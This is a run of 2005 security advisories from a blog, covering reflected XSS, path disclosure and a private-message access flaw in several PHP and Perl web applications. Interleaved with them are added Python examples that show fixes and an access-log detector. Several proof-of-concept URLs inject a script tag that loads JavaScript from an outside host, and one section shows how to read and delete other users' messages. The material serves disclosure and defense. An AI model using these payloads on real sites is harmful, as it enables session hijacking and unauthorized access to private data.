/>http://[victim]/calendar/modules/eventlist.inc.php?&Y=2005&m=8&d=2&cal_id=0&language=german&gmt_ofs=-1&view=d30&view=d1[XSS-CODE] // all variables are affected by XSS flaws<br /><br />http://[victim]/calendar/modules/calendar.inc.php?Y=2013&m=8&d=2&cal_id=0&language=german&gmt_ofs=-1&view=d30 // all variables are affected by XSS flaws<br /><br /><br />##############<br />versions<br />##############<br />Jax Calendar 1.34<br />Jax Calendar 1.33<br /><br /><br />#################<br />7- Jax DWT Editor<br />#################<br /><br />Cross-site scripting:<br /><br />http://[victim]/dwt_editor/dwt_editor.php?language=english[XSS-CODE]&cur_dir=%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor<br /><br />http://[victim]/dwt_editor/dwt_editor.php?language=english&cur_dir=[XSS-CODE]%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor<br /><br />http://[victim]/dwt_editor/dwt_editor.php?do=editarea&cur_dir=%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor%2Ffiles%2Fzweit+ebene&file=5db14c3963eff6b87ce20155708fd867&language=german&area=textbereich2[XSS-CODE]<br /><br /><br />##############<br />versions<br />##############<br /><br />Jax DWT Editor v1.0<br /><br /><br />###################<br />8- Timeline<br />###################<br /><br />Discovered: 27-07-2005<br />Vendor notified: 04-08-2005<br />Vendor response: 04-08-2005<br />Disclosure: 05-08-2005<br /><br />#################### €nd #############################<br /><br />Thanks to Estrella for being my light.<br />--<br />Sincerely,<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1122565112657242842005-07-28T13:00:00.000-07:002005-08-02T01:08:05.813-07:00@Mail multiple variable cross-site scripting#############################################<br />@Mail multiple variable cross-site scripting<br />Vendor URL: http://www.atmail.com<br />Advisory: http://lostmon.blogspot.com/2005/07/mail-multiple-variable-cross-site.html<br />Vendor notified: yes. Exploit available: yes<br />OSVDB ID: <a href="http://osvdb.org/displayvuln.php?osvdb_id=18337" target="_BLANK">18337</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18338" target="_BLANK">18338</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18339" target="_BLANK">18339</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18340" target="_BLANK">18340</a><br />Secunia: <a href="http://secunia.com/advisories/16252/" target="_BLANK">SA16252</a><br />BID: <a href="http://securityfocus.com/bid/14408" target="_BLANK">14408</a><br />##############################################<br /><br /><br />@Mail is a feature-rich email solution that allows users to access email resources via the web or a variety of wireless devices. The software incorporates a complete email server package to manage and host user email at your domain(s).<br /><br /><br />@Mail contains a flaw that allows a remote cross-site scripting attack. The flaw exists because the application does not validate multiple variables upon submission to multiple scripts. This could allow an attacker to craft a URL that, when opened by a victim, executes arbitrary script code in the victim's browser within the trust relationship between the browser and the server, leading to a loss of integrity.<br /><br />#############<br />versions<br />#############<br /><br />@Mail 4.03 WebMail for Windows<br />@Mail 4.11 - Linux / FreeBSD / Solaris / HP-UX / OS-X<br /><br />It is also possible that other versions are vulnerable.<br /><br />#################<br />solution<br />#################<br /><br />Apply the patch for version 4.11:<br />http://calacode.com/patch.pl<br /><br />#################<br />Timeline<br />#################<br /><br />Discovered: 02-07-2005<br />Vendor notified: 27-07-2005<br />Vendor response: 28-07-2005<br />Disclosure: 28-07-2005<br /><br /><br />##################<br />Proof of concept<br />##################<br /><br />Exploiting these flaws requires a client login, and exploiting the flaws in /webadmin/ requires an admin login. The realistic attack is therefore a crafted link sent to an authenticated user or administrator, rather than one aimed at anonymous visitors; the injected script then runs with that user's webmail (or webadmin) session.<br /><br />###################<br />printcal.pl<br />###################<br /><br />http://[victim]/printcal.pl?year=[XSS-CODE]&month=11&type=4<br /><br />http://[victim]/printcal.pl?year=&month=11&type=4[XSS-CODE]<br /><br />http://[victim]/printcal.pl?type=4[XSS-CODE]<br /><br />###################<br />task.pl<br />###################<br /><br />http://[victim]/task.pl?func=todo[XSS-CODE]<br /><br />###################<br />compose.pl<br />####################<br /><br />http://[victim]/compose.pl?id=cur/1117452847.H104572P10795.[victim].com%3A2%2C&folder=Sent&cache=&func=reply&type=reply[XSS-CODE]<br /><br />http://[victim]/compose.pl?spellcheck=112253846919856.sc.new&func=spellcheck&HtmlEditor=1&unique=19944&msgtype=r[XSS-CODE]<br /><br />http://[victim]/compose.pl?spellcheck=112253846919856.sc.new&func=spellcheck&HtmlEditor=1&unique=19944[XSS-CODE]&msgtype=r<br /><br />http://[victim]/compose.pl?func=new&To=lala@lala.es&Cc=&Bcc=[XSS-CODE]<br /><br />http://[victim]/compose.pl?func=new&To=lala@lala.es&Cc=[XSS-CODE]&Bcc=<br /><br />http://[victim]/compose.pl?func=new&To=lala@lala.es[XSS-CODE]&Cc=&Bcc=<br /><br />###################<br />webadmin/filter.pl<br />###################<br /><br />http://[victim]/webadmin/filter.pl?func=viewmailrelay&Order=IPaddress[XSS-CODE]<br /><br />http://[victim]/webadmin/filter.pl?func=filter&Header=blacklist_from&Type=1[XSS-CODE]&View=1<br /><br />http://[victim]/webadmin/filter.pl?func=filter&Header=blacklist_from[XSS-CODE]&Type=1&View=1<br /><br />http://[victim]/webadmin/filter.pl?func=filter&Header=whitelist_from&Type=0&Display=1&Sort=value[XSS-CODE]&Type=1&View=1<br /><br /><br /><br />######################## €nd ##########################<br /><br />Thanks to Estrella for being my light<br /><br />Sincerely,<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1122370636085146722005-07-27T06:35:00.000-07:002005-08-05T03:06:27.796-07:00Clever Copy Unauthorized read & delete Private Messages################################################<br />Clever Copy unauthorized read & delete of private messages<br />Vendor URL: http://clevercopy.bestdirectbuy.com<br />Advisory: http://lostmon.blogspot.com/2005/07/clever-copy-unauthorized-read-delete.html<br />Vendor notified: yes. Exploit available: yes<br />OSVDB ID: <a href="http://osvdb.org/displayvuln.php?osvdb_id=18509" target="_BLANK">18509</a><br />Secunia: <a href="http://secunia.com/advisories/16236/" target="_BLANK">SA16236</a><br />BID: <a href="http://securityfocus.com/bid/14397" target="_BLANK">14397</a><br />################################################<br /><br /><br />Clever Copy is a free, fully scalable web site portal and news posting system. You can run it as a very simple blog or ramp it up to a full content management system.<br /><br />Clever Copy contains a flaw that allows an authenticated user to read and delete other users' private messages without authorization.<br /><br />The flaw is triggered when an authenticated user requests a special URL directly: readpm.php selects the mailbox from the 'user' query parameter rather than from the logged-in session, so any account can name any other user and gain unauthorized access to that user's private messages. The message ID is a small sequential number, so it can simply be enumerated.<br /><br />############<br />versions<br />############<br /><br />Clever Copy 2.0<br />Clever Copy 2.0a<br /><br />###############<br />Solution<br />###############<br /><br />No solution at this time!<br /><br />###################<br />Timeline<br />###################<br /><br />Discovered: 25-07-2005<br />Vendor notified: 26-07-2005<br />Disclosure: 27-07-2005<br /><br />###################<br />proof of concept<br />###################<br /><br />First we must be logged in, so that we have access to private messages at all; then we request this URL:<br /><br />http://[victim]/readpm.php?op=read&ID=2&name=pruebas&user=waltrapass<br /><br />or<br /><br />http://[victim]/readpm.php?op=read&ID=2&user=waltrapass<br /><br />and we see message 2 of user waltrapass :)<br /><br />op = read or del<br />ID = ID of the message we want to look at<br />name = username of the user who sent the private message (not necessary to view or delete a message)<br />user = username of the user whose PMs we are trying to look at<br /><br />To delete a message we request a similar URL:<br /><br />http://[victim]/readpm.php?op=del&ID=2&name=pruebas&user=waltrapass<br /><br />or<br /><br />http://[victim]/readpm.php?op=del&ID=2&user=waltrapass<br /><br />##################### €nd #############################<br /><br />Thanks to Estrella for being my light<br />Thanks to http://www.osvdb.org/<br /><br />Sincerely,<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
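The proof of concept above works because readpm.php lets the request, not the session, decide whose mailbox is opened. The code below is an added example, not Clever Copy's PHP: it models the handler with a constructed in-memory store keyed by (message ID, mailbox owner). `readpm_vulnerable` reproduces the flaw by trusting the 'user' parameter; `readpm_fixed` derives the mailbox from the session and accepts 'user' and 'name' only to ignore them, so a message ID alone never reaches another user's mailbox. The usernames pruebas and waltrapass come from the advisory; the message bodies are made up.

```python
"""Authorisation check for a private-message handler like readpm.php (added example)."""
from typing import Optional


class Forbidden(Exception):
    """Raised when the acting session may not perform the requested operation."""


def sample_store() -> dict:
    # Constructed sample data: (ID, mailbox owner) -> message.
    return {
        (2, "waltrapass"): {"from": "pruebas", "body": "meet at 10"},
        (3, "attacker"): {"from": "someone", "body": "hi"},
    }


def _apply(store: dict, key: tuple, op: str):
    # One error for "wrong mailbox" and "no such ID": the response must not tell a
    # caller whether an ID exists in somebody else's mailbox.
    if key not in store:
        raise Forbidden("no such message in this mailbox")
    if op == "read":
        return store[key]["body"]
    if op == "del":
        del store[key]
        return True
    raise ValueError("op must be 'read' or 'del'")


def readpm_vulnerable(store: dict, session_user: Optional[str], op: str, msg_id: int,
                      user: str, name: Optional[str] = None):
    """The flaw from the advisory: any login may name any 'user' ('name' is ignored)."""
    if session_user is None:
        raise Forbidden("login required")
    return _apply(store, (msg_id, user), op)


def readpm_fixed(store: dict, session_user: Optional[str], op: str, msg_id: int,
                 user: Optional[str] = None, name: Optional[str] = None):
    """Mailbox comes from the session; 'user' and 'name' are never trusted."""
    if session_user is None:
        raise Forbidden("login required")
    return _apply(store, (msg_id, session_user), op)


if __name__ == "__main__":
    store = sample_store()
    print(readpm_vulnerable(store, "attacker", "read", 2, user="waltrapass"))  # leaks
    try:
        readpm_fixed(store, "attacker", "read", 2, user="waltrapass")
    except Forbidden as exc:
        print("fixed handler:", exc)
```

The same rule applies to the delete path: the fixed handler deletes only from the session's own mailbox, and a delete of someone else's ID fails with the same error as a read, so the op parameter gives no extra leverage.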
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1122451313349512652005-07-27T00:59:00.000-07:002005-07-29T01:07:43.726-07:00Multiple Cross site scripting in BMForum################################################<br />Multiple cross-site scripting in BMForum<br />Vendor URL: http://www.bmforum.com/<br />Advisory: http://lostmon.blogspot.com/2005/07/multiple-cross-site-scripting-in.html<br />Vendor notified: yes. Exploit available: yes<br />OSVDB ID: <a href="http://osvdb.org/displayvuln.php?osvdb_id=18306" target="_BLANK">18306</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18307" target="_BLANK">18307</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18308" target="_BLANK">18308</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18309" target="_BLANK">18309</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18310" target="_BLANK">18310</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18311" target="_BLANK">18311</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18312" target="_BLANK">18312</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18313" target="_BLANK">18313</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18314" target="_BLANK">18314</a><br />Secunia: <a href="http://secunia.com/advisories/16224/" target="_BLANK">SA16224</a><br />BID: <a href="http://securityfocus.com/bid/14396" target="_blank">14396</a><br />################################################<br /><br /><br />BMForum contains a flaw that allows a remote cross-site scripting attack. The flaw exists because the application does not validate multiple variables upon submission to multiple scripts (topic.php, forums.php, post.php and announcesys.php; see below). This could allow an attacker to craft a URL that, when opened by a victim, executes arbitrary script code in the victim's browser within the trust relationship between the browser and the server, leading to a loss of integrity.<br /><br /><br /><br />####################<br />VERSIONS<br />####################<br /><br />BMForum Datium! 3.0 RC4<br />BMForum Datium! 3.0 RC3<br />BMForum Datium! 3.0 RC2<br />BMForum Datium! 3.0 RC1<br />BMForum Plus! 3.0 RC4<br />BMForum Plus! 3.0 RC3<br />BMForum Plus! 3.0 RC2<br />BMForum Plus! 3.0 RC1<br />BMForum Plus!MX 3.0.0.5<br />BMForum Plus! 2.6.1<br /><br /><br />###################<br />Solution:<br />###################<br /><br />No solution at this time.<br /><br />###################<br />Timeline:<br />###################<br /><br />Discovered: 21-07-2005<br />Vendor notified: 25-07-2005<br />Disclosure: 27-07-2005<br /><br />###################<br />Proof of XSS<br />####################<br /><br />####################<br />topic.php<br />####################<br /><br />http://[VICTIM]/bmb/topic.php?forumid=6&filename=38496&page=2[XSS-CODE]<br />http://[VICTIM]/bmb/topic.php?forumid=6&filename=38496[XSS-CODE]&page=2<br />http://[VICTIM]/topic.php?filename=1923[XSS-CODE]<br /><br />#################<br />forums.php<br />#################<br /><br />http://[VICTIM]/bmb/forums.php?forumid=6[XSS-CODE]<br />http://[VICTIM]/bmb/forums.php?forumid=6&listby=posttime[XSS-CODE]&jinhua=&page=<br />http://[VICTIM]/bmb/forums.php?forumid=6&listby=posttime&jinhua=[XSS-CODE]&page=<br />http://[VICTIM]/bmb/forums.php?forumid=6&listby=posttime&jinhua=&page=[XSS-CODE]<br /><br /><br />###################<br />post.php<br />###################<br /><br />http://[VICTIM]/post.php?forumid=2\[XSS-CODE]<br /><br />###################<br />announcesys.php<br />###################<br /><br />http://[VICTIM]/announcesys.php?forumid=0[XSS-CODE]<br /><br />#################<br />Others<br />#################<br /><br />These files can be requested directly and reveal data or the installation's filesystem path:<br /><br />http://[VICTIM]/datafile/regipbans.php // banned IPs.<br />http://[VICTIM]/bmb/datafile/sendmail.php // full path disclosure.<br />http://[VICTIM]/post_global.php // full path disclosure.<br />http://[VICTIM]/bmb/datafile/bbslog2.txt // data disclosure.<br />http://[VICTIM]/bmb/bbslog.txt // data disclosure.<br /><br />################### €nd ######################<br /><br />Thanks to Estrella for being my light.<br /><br />Sincerely,<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1121944329508154792005-07-21T04:09:00.000-07:002005-07-26T01:50:33.823-07:00CMSimple 'search' variable XSS##############################################<br />CMSimple 'search' variable XSS<br />Vendor URL: http://www.cmsimple.dk/<br />Advisory: http://lostmon.blogspot.com/2005/07/cmsimple-search-variable-xss.html<br />Vendor fix: http://www.cmsimple.dk/forum/viewtopic.php?t=2470<br />Vendor confirmed: yes. Exploit available: yes<br />OSVDB ID: <a href="http://osvdb.org/displayvuln.php?osvdb_id=18128" target="_BLANK">18128</a><br />Secunia: <a href="http://secunia.com/advisories/16147/" target="_BLANK">SA16147</a><br />BID: <a href="http://securityfocus.com/bid/14346" target="_BLANK">14346</a><br />SecurityTracker: <a href="http://securitytracker.com/id?1014556" target="_BLANK">1014556</a><br />##############################################<br /><br /><br /><br />CMSimple is a simple content management system for the smart maintenance of small commercial or private sites. It is simple - small - smart!<br /><br /><br />CMSimple contains a flaw that allows a remote cross-site scripting attack. The flaw exists because the application does not validate the 'search' variable upon submission to the 'index.php' script: printlink() in cmsimple/cms.php appends the raw search term to the href of the "print" link, so a term that contains a quote closes the attribute and whatever follows is rendered as markup. This could allow an attacker to craft a URL that, when opened by a victim, executes arbitrary script code in the victim's browser within the trust relationship between the browser and the server, leading to a loss of integrity.<br /><br />The index.php file contains only an include of the cmsimple/cms.php file.<br /><br /><br />#############<br />VERSIONS<br />#############<br /><br />CMSimple 2.4 and earlier versions<br /><br /><br />#############<br />Solution<br />#############<br /><br />Vendor fix:<br />http://www.cmsimple.dk/forum/viewtopic.php?t=2470<br /><br />Fix: the line<br /><br />function printlink(){global $f,$search,$file,$sn,$su,$tx;$t=amp().'print';if($f=='search')$t.=amp().'function=search'.amp().'search='.$search;<br /><br />should be replaced with:<br /><br />function printlink(){global $f,$search,$file,$sn,$su,$tx;$t=amp().'print';if($f=='search')$t.=amp().'function=search'.amp().'search='.htmlspecialchars(stripslashes($search));<br /><br />This will be fixed in the next beta.<br /><br />#############<br />Timeline<br />#############<br /><br />Discovered: 13-07-2005<br />Vendor notified: 20-07-2005<br />Vendor response: 21-07-2005<br />Vendor fix: 21-07-2005<br />Disclosure: 21-07-2005<br /><br /><br />################<br />Proof of concept<br />################<br /><br />http://[victim]/index.php?&print&function=search&search="><script src="http://www.drorshalev.com/dev/injection/js.js"></script><br /><br /><br /><br />http://[victim]/?function=search&search=[XSS-CODE]<br /><br />http://[victim]/?&print&function=search&search=[XSS-CODE]<br /><br />http://[victim]/?License&function=search&search=[XSS-CODE]<br /><br />http://[victim]/?Resellers&function=search&search=[XSS-CODE]<br /><br />http://[victim]/?&guestbook&function=search&search=[XSS-CODE]<br /><br /><br />###################### €nd #########################<br /><br />Thanks to Estrella for being my light<br />Thanks to http://www.drorshalev.com/ for hosting the 'js.js' script<br />--<br />Sincerely,<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
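To make the effect of the vendor's one-line fix visible on the advisory's own payload, here is the printlink() change restated in Python as an added example (this is not CMSimple's code). `printlink_vulnerable` concatenates the search term raw, as the original did; `printlink_fixed` applies htmlspecialchars(stripslashes($search)). stripslashes only matters when PHP's magic_quotes_gpc, commonly on at the time, has already backslash-escaped the request value; the `magic_quotes` flag models that. `amp()` is CMSimple's separator helper and is assumed here to return the entity form of '&'; the `<a>` wrapper around $t is an assumption about how the link is rendered.

```python
"""CMSimple printlink() before and after the htmlspecialchars(stripslashes()) fix (added example)."""
import re
from html import escape


def amp() -> str:
    # Assumed behaviour of CMSimple's amp() helper: the entity form of '&'.
    return "&amp;"


def php_addslashes(s: str) -> str:
    # What magic_quotes_gpc did to every incoming request value.
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def php_stripslashes(s: str) -> str:
    # Inverse of addslashes: drop the backslash in front of each escaped character.
    return re.sub(r"\\(.?)", r"\1", s)


def _print_link(f: str, search: str, encode: bool, magic_quotes: bool) -> str:
    value = php_addslashes(search) if magic_quotes else search
    t = amp() + "print"
    if f == "search":
        if encode:
            # htmlspecialchars(): PHP's default at the time (ENT_COMPAT) left the
            # single quote alone; html.escape also encodes it, which is stricter.
            value = escape(php_stripslashes(value), quote=True)
        t += amp() + "function=search" + amp() + "search=" + value
    return '<a href="?' + t + '">print</a>'


def printlink_vulnerable(f: str, search: str, magic_quotes: bool = False) -> str:
    return _print_link(f, search, encode=False, magic_quotes=magic_quotes)


def printlink_fixed(f: str, search: str, magic_quotes: bool = False) -> str:
    return _print_link(f, search, encode=True, magic_quotes=magic_quotes)


def anchor_content(link: str) -> str:
    # What a browser treats as the anchor's content: the href value ends at the first
    # raw quote and the start tag at the next '>'. Anything between those that the
    # search term supplied becomes live markup.
    _, _, rest = link.partition('href="')
    _, _, after = rest.partition('"')
    _, _, content = after.partition(">")
    return content


def breaks_out_of_href(link: str) -> bool:
    return anchor_content(link).lstrip().startswith("<")


PAYLOAD = '"><script src="http://www.drorshalev.com/dev/injection/js.js"></script>'

if __name__ == "__main__":
    print(printlink_vulnerable("search", PAYLOAD))
    print(printlink_fixed("search", PAYLOAD))
```

Note that a backslash from magic_quotes does not help the vulnerable version: `\"` still contains a quote as far as the HTML parser is concerned, so the attribute closes either way. htmlspecialchars protects the HTML attribute context; since the value also sits inside a URL, urlencode() on the term before htmlspecialchars() would be the complete encoding for that position.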
</div>
<br /><br />
Clever copy Path disclosure and XSS<br />
Posted by Lostmon, 2005-07-18 (updated 2005-08-01)<br />
################################################<br />
Clever Copy path disclosure and XSS<br />
vendor url: http://clevercopy.bestdirectbuy.com<br />
advisory: http://lostmon.blogspot.com/2005/07/clever-copy-path-disclosure-and-xss.html<br />
vendor notify: yes  exploit available: yes<br />
OSVDB ID: <a href="http://osvdb.org/displayvuln.php?osvdb_id=18349">18349</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18350">18350</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18351">18351</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18352">18352</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18353">18353</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18354">18354</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18355">18355</a>,<br />
<a href="http://osvdb.org/displayvuln.php?osvdb_id=18356">18356</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18357">18357</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18358">18358</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18359">18359</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18360">18360</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18361">18361</a><br />
Secunia: <a href="http://secunia.com/advisories/16236/" target="_BLANK">SA16236</a><br />
BID: <a href="http://securityfocus.com/bid/14395" target="_BLANK">14395</a><br />
################################################<br /><br />
Clever Copy is a free, fully scalable web site portal and news posting<br />
system. You can run it as a very simple blog or ramp it up to a full<br />
Content Management System.<br /><br />
Clever Copy contains a flaw that allows a remote cross site scripting<br />
attack. This flaw exists because the application does not validate the<br />
'searchtype' and 'searchterm' variables upon submission to the<br />
'results.php' and 'categorysearch.php' scripts. This could allow a user<br />
to create a specially crafted URL that would execute arbitrary code in<br />
a user's browser within the trust relationship between the browser and<br />
the server, leading to a loss of integrity.<br /><br />
##############<br />
VERSIONS<br />
##############<br /><br />
Clever Copy version 2.0a<br />
Clever Copy version 2.0<br /><br />
##############<br />
SOLUTION<br />
##############<br /><br />
No solution at this time<br /><br />
##############<br />
TIMELINE<br />
##############<br /><br />
Discovered: 15-07-2005<br />
Vendor notify: 18-07-2005<br />
Vendor response: 18-07-2005<br />
Disclosure: 19-07-2005<br /><br />
##############<br />
EXPLOITS<br />
##############<br /><br />
http://[VICTIM]/results.php?searchtype="><script src="http://www.drorshalev.com/dev/injection/js.js"></script>category&searchterm=Announcements<br /><br />
http://[VICTIM]/results.php?searchtype=category&searchterm="><scriptsrc="http://www.drorshalev.com/dev/injection/js.js&quot;></script>Announcements<br /><br />
http://[VICTIM]/results.php?start=0&searchtype="><script src="http://www.drorshalev.com/dev/injection/js.js"></script>category&searchterm=Announcements<br /><br />
http://[VICTIM]/results.php?start=0&searchtypecategory&searchterm=Announcements="><script src="http://www.drorshalev.com/dev/injection/js.js"></script><br /><br />
http://[VICTIM]/categorysearch.php?star=0&searchtype="><script src="http://www.drorshalev.com/dev/injection/js.js"></script>category&searchterm=Announcements<br /><br />
http://[VICTIM]/categorysearch.php?star=0&searchtypecategory&searchterm=Announcements"><script src="http://www.drorshalev.com/dev/injection/js.js"></script><br /><br />
################################<br />
direct request path disclosure:<br />
################################<br /><br />
(these include-only scripts reveal the installation path when requested directly)<br /><br />
http://[VICTIM]/ticker.php<br />
http://[VICTIM]/menu.php<br />
http://[VICTIM]/banned.php<br />
http://[VICTIM]/endlayout.php<br />
http://[VICTIM]/randomhlinesblock.php<br />
http://[VICTIM]/showlast.php<br />
http://[VICTIM]/showlast5class1.php<br />
http://[VICTIM]/showlast5phorum.php<br />
http://[VICTIM]/showlast5phorumblock.php<br />
http://[VICTIM]/showlastforumbb2.php<br />
http://[VICTIM]/showlastforumbb2block.php<br /><br /><br />
######################## €nd #############################<br /><br />
Thanks to Estrella for being my light<br />
Thanks to http://www.drorshalev.com/ for hosting the 'js.js' script<br />
--<br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer">
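For a site running Clever Copy, the practical question after reading this advisory is how to spot the probes above in the web server's access log. The detector below is an added example and not part of the original advisory: it decodes each request's query string (including double-encoded values), flags parameters carrying the attribute break-out plus `<script` shape used in the URLs above, and flags direct requests for the include-only scripts the advisory lists as disclosing the path. The log lines and the `js.example.invalid` host are constructed for the demo.

```python
"""Access-log triage for the two request shapes in the Clever Copy advisory:
reflected-XSS probes against results.php / categorysearch.php and direct
requests for include-only scripts that disclose the install path.
Added example, not part of the original advisory: the log lines are
constructed for the demo, the include-file list is the advisory's own."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Scripts the advisory lists as leaking the path when requested directly.
INCLUDE_ONLY = {
    "/ticker.php", "/menu.php", "/banned.php", "/endlayout.php",
    "/randomhlinesblock.php", "/showlast.php", "/showlast5class1.php",
    "/showlast5phorum.php", "/showlast5phorumblock.php",
    "/showlastforumbb2.php", "/showlastforumbb2block.php",
}

# Attribute break-out followed by a script element, or a remote script include.
# Matched on the fully decoded value so %22%3E%3Cscript and "><script look alike.
XSS_MARKER = re.compile(r'["\'>]\s*<\s*script\b|<\s*script\s+src\s*=', re.IGNORECASE)

# Apache/nginx combined log format: client, identity, user, time, request, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding; probes are often double-encoded."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return (kind, where) findings for one access-log line, or []."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    findings = []
    if url.path in INCLUDE_ONLY:
        findings.append(("path_disclosure_probe", url.path))
    # parse_qs already decodes one layer; decode_fully handles the rest.
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        for value in values:
            if XSS_MARKER.search(decode_fully(value)):
                findings.append(("reflected_xss_probe", f"{url.path}?{name}"))
    return findings

def scan(lines):
    """Group findings by client address so the analyst sees who is probing."""
    report = {}
    for line in lines:
        hits = classify(line)
        if hits:
            ip = LOG_RE.match(line)["ip"]
            report.setdefault(ip, []).extend(hits)
    return report

# Constructed sample: three probes from one client, normal traffic from another.
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Jul/2005:15:05:01 -0700] "GET /results.php?searchtype=%22%3E%3Cscript%20src=%22http://js.example.invalid/x.js%22%3E%3C/script%3Ecategory&searchterm=Announcements HTTP/1.1" 200 5120',
    '203.0.113.7 - - [18/Jul/2005:15:05:09 -0700] "GET /categorysearch.php?start=0&searchtype=category&searchterm=%2522%253E%253Cscript%253Ealert(1)%253C/script%253E HTTP/1.1" 200 4870',
    '203.0.113.7 - - [18/Jul/2005:15:06:30 -0700] "GET /showlast5phorum.php HTTP/1.1" 200 312',
    '198.51.100.4 - - [18/Jul/2005:15:07:02 -0700] "GET /results.php?searchtype=category&searchterm=Announcements HTTP/1.1" 200 6011',
    '198.51.100.4 - - [18/Jul/2005:15:07:15 -0700] "GET /index.php HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG).items():
        print(ip)
        for kind, where in hits:
            print(f"  {kind:22} {where}")
```

Run as a script it prints a per-client summary; against a real access log you would alert on any client with findings, since a normal visitor never requests menu.php or ticker.php directly and never sends a `"><script` sequence in a search field.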
</div>
<br /><br />
Clever copy 'calendar.php' 'yr' variable cross site scripting<br />
Posted by Lostmon, 2005-07-15 (updated 2005-07-18)<br />
################################################<br />
Clever Copy 'calendar.php' 'yr' variable cross site scripting<br />
vendor url: http://clevercopy.bestdirectbuy.com<br />
advisory: http://lostmon.blogspot.com/2005/07/clever-copy-calendarphp-yr-variable.html<br />
vendor notify: yes  exploit available: yes<br />
OSVDB ID: <a href="http://osvdb.org/displayvuln.php?osvdb_id=17919" target="_BLANK">17919</a><br />
Securitytracker: <a href="http://securitytracker.com/id?1014492" target="_BLANK">1014492</a><br />
BID: <a href="http://securityfocus.com/bid/14278" target="_BLANK">14278</a><br />
################################################<br /><br />
Clever Copy is a free, fully scalable web site portal and news posting<br />
system. You can run it as a very simple blog or ramp it up to a full<br />
Content Management System.<br /><br />
Clever Copy contains a flaw that allows a remote cross site scripting<br />
attack. This flaw exists because the application does not validate the 'yr'<br />
variable upon submission to the 'calendar.php' script. This could allow a<br />
user to create a specially crafted URL that would execute arbitrary<br />
code in a user's browser within the trust relationship between<br />
the browser and the server, leading to a loss of integrity.<br /><br />
##############<br />
VERSIONS<br />
##############<br /><br />
Clever Copy version 2.0a<br />
Clever Copy version 2.0<br /><br />
##############<br />
SOLUTION<br />
##############<br /><br />
No solution at this time<br /><br />
##############<br />
TIMELINE<br />
##############<br /><br />
Discovered: 12-07-2005<br />
Vendor notify: 13-07-2005<br />
Vendor response: 14-07-2005<br />
Disclosure: 15-07-2005<br /><br />
##############<br />
EXPLOIT<br />
##############<br /><br />
http://[victim]/calendar.php?mth=3&yr=2006"><script src="http://www.drorshalev.com/dev/injection/js.js"></script><br /><br />
######################## €nd #############################<br /><br />
Thanks to Estrella for being my light<br />
--<br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
--<br />
Curiosity is what moves the mind...<div class="blogger-post-footer">
</div>
<br /><br />
class-1 Forum Software Cross site scripting<br />
Posted by Lostmon, 2005-07-14 (updated 2005-07-18)<br />
#########################################################<br />
class-1 Forum Software cross site scripting.<br />
